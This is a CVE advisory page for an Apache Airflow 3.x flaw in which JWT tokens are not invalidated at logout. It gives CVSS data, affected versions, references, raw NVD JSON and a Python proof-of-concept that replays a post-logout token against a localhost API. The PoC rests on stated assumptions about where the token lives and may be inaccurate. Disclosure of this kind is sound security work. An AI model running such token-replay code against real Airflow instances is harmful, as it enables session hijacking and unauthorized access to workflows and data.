Security Vulnerability Report
CVE-2025-57735 CVSS 9.1 CRITICAL

CVE-2025-57735

Published: 2026-04-09 11:16:21
Last Modified: 2026-04-17 13:03:16

Description

When a user logged out, the JWT token the user had authenticated with was not invalidated, which could lead to reuse of that token in case it was intercepted. In Airflow 3.2 we implemented the mechanism that implements token invalidation at logout. Users who are concerned about the logout scenario and possibility of intercepting the tokens, should upgrade to Airflow 3.2+. Users are recommended to upgrade to version 3.2.0, which fixes this issue.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* - VULNERABLE
Apache Airflow >= 3.0.0 and < 3.2.0 (CWE-613: Insufficient Session Expiration)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL configuration
target_url = "http://localhost:8080/api/v1/dags"
login_url = "http://localhost:8080/login"
logout_url = "http://localhost:8080/logout"

# Step 1: Attacker monitors traffic or waits for user to login
print("[+] Step 1: Intercepting traffic...")

# Step 2: User logs in (simulated)
session = requests.Session()
login_payload = {"username": "admin", "password": "password"}
session.post(login_url, data=login_payload)

# Step 3: Attacker captures the JWT Token from the request headers or cookies
# In a real scenario, this is done via sniffing or XSS
jwt_token = session.cookies.get("session")  # Assuming session cookie holds the JWT
print(f"[+] Captured JWT Token: {jwt_token}")

# Step 4: User logs out
print("[+] Step 4: User performs logout...")
logout_response = session.get(logout_url)
print(f"[+] Logout status code: {logout_response.status_code}")

# Step 5: Attacker reuses the intercepted token
print("[+] Step 5: Attacker reuses intercepted token...")
attack_headers = {"Authorization": f"Bearer {jwt_token}"}
attack_response = requests.get(target_url, headers=attack_headers)

# Step 6: Check if the request is successful
if attack_response.status_code == 200:
    print("[!] VULNERABILITY CONFIRMED: Token is still valid after logout.")
    print(f"[+] Response Data: {attack_response.text[:100]}...")
else:
    print("[-] Token was invalidated. Vulnerability not present.")
```

References

https://github.com/apache/airflow/pull/56633 (Issue Tracking)
https://github.com/apache/airflow/pull/61339 (Issue Tracking)
https://lists.apache.org/thread/ovn8mpd8zkc604hojt7x3wsw3kc60x98 (Mailing List, Vendor Advisory)
http://www.openwall.com/lists/oss-security/2026/04/09/16 (Mailing List, Third Party Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-57735", "sourceIdentifier": "[email protected]", "published": "2026-04-09T11:16:20.757", "lastModified": "2026-04-17T13:03:16.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When user logged out, the JWT token the user had authtenticated with was not invalidated, which could lead to reuse of that token in case it was intercepted. In Airflow 3.2 we implemented the mechanism that implements token invalidation at logout. Users who are concerned about the logout scenario and possibility of intercepting the tokens, should upgrade to Airflow 3.2+\n\n\n\nUsers are recommended to upgrade to version 3.2.0, which fixes this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.2.0", "matchCriteriaId": "D8133DE3-F556-42F5-8298-FD4CF40787B6"}]}]}], "references": [{"url": "https://github.com/apache/airflow/pull/56633", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/apache/airflow/pull/61339", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://lists.apache.org/thread/ovn8mpd8zkc604hojt7x3wsw3kc60x98", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/09/16", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}
```